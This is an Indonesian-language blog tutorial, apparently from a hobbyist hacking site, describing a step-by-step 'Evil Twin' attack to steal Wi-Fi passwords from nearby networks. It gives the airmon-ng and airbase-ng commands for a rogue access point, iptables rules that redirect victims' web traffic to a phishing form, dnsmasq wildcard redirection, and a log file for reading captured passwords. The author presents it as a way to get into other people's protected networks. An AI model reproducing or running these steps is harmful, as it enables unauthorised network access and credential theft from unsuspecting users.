Calling The Password

selamat pagi semuanya.

kali ini saya akan membagikan sebuah tutorial yang pastinya bakal buat kalian penasaran.

teknik ini saya sebut dengan "Call The Password". teknik ini sebenarnya hanya sebuah keylogger biasa. tetapi tujuan keylogger ini adalah mengambil sebuah password wifi. Naaaaahhhh kalian pasti sering banged yang namanya nemu wifi yang terproteksi oleh password dan tidak tahu apa passwordnya khan???? Hehehehehehe.... Dari tutorial ini mungkin kalian akan bisa mempelajarinya.

Sekilas, teknik ini sebenarnya sudah ( teknik ini dikenal sebagai "Evil Twins Attack"). Tetapi dalam kasus ini, saya bersama kawan saya mengimprove (yaelah bahasa gue kaku amat :v) teknik ini tanpa harus brute forcing password tersebut.

Baca : Evil Twin Brute Force 

setelah kalian membaca refrensi tadi, pasti kalian tau dunk apa bedanya dengan teknik yang saya dan teman saya kembangkan????
langsung saja yok...

Pertama, yang kalian butuhkan adalah Linux (linux apapun itu jenisnya), Apache2, dnsmasq, dhcp-server, html atau php keylogger yang kalian buat (nanti akan di paparkan di bawah cara membuatnya), wireless external (karena memakai wireless internal saya belum mencobanya), kopi rokok dan lain sebagainya agar kalian nyaman membuatnya hahahahahahah. oh ya dan tidak lupa aircrack-ng keluraga (karena tanpa beliau tutor ini tidak jalan :v)

yang pertama kalian harus lakukan adalah membuka terminal dan ketikan sudo airmon-ng start wlan2 (cek wlan yang akan kalian pake dengan mengetikan airmon-ng, dan liat wireless external kalian di wlan berapa)

kalau sudah ketikkan seperti ini = airbase-ng -e (nama wifi) -c (channel) mon0. jika ingin melihat nama wifi yang akan kalian serang dan berada di channel berapa kalian bisa ketikkan ini di terminal baru = airodump-ng mon0. di sama kalian akan melihat semua wifi yang ada di sekitar mu.

lanjut lagi... setelah itu kalian akan menggunakan command ini untuk mengaktifkan dhcp kalian =

ifconfig at0 up
ifconfig at0 192.168.10.1 netmask 255.255.255.0 
route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1 
iptables --flush 
iptables --table nat --flush 
iptables --delete-chain 
iptables --table nat --delete-chain 
iptables --table nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to-destination 192.168.10.1:80/form.php 
iptables -t nat -A POSTROUTING -j MASQUERADE 
echo "1" > /proc/sys/net/ipv4/ip_forward 
dhcpd -cf /etc/dhcp/dhcpd.conf at0

atau kalian tidak mau ribet, kalian bisa membuat file bash dengan leaf pad atau sejenisnya dengan menambahkan #!/bin/bash di atas ifconfig at0 up dan simpen dengan nama file.bash
oh ya setting dhcp nya harus sama dengan ip untuk iptablesnya ya..... search di google cara setting dhcp...

selanjutnya kita akan mengaktifkan dnsmasq nya... sebelumnya kalian harus menginstall dnsmasq dl dengan mengetikan di terminal apt-get install dnsmasq.. untuk file yang di modif ada di /etc/dnsmasq.hosts
di sana kalian isi ip at0 kalian misalkan 192.168.10.1 * (bintang berfungsi untuk menredirect semua apapun yang korban buka di browser)

setelah itu, siapkan file index.html , proses.php , dan login.txt..... (file silahkan download. link ada di akhir artikel ini.

setelah itu simpan di /var/www/html.
buka terminal baru dan ketikkan tail -f /var/www/html/login.txt

tunggu beberapa saat dan korban akan masuk ke dalam jebakan barman kita... :v....

berikut adalah video yang sudah saya buat....

Link Download index.html
index file 

Hope you enjoy it.. and keep learning....

Reagard From O.W.L ^_^


Comments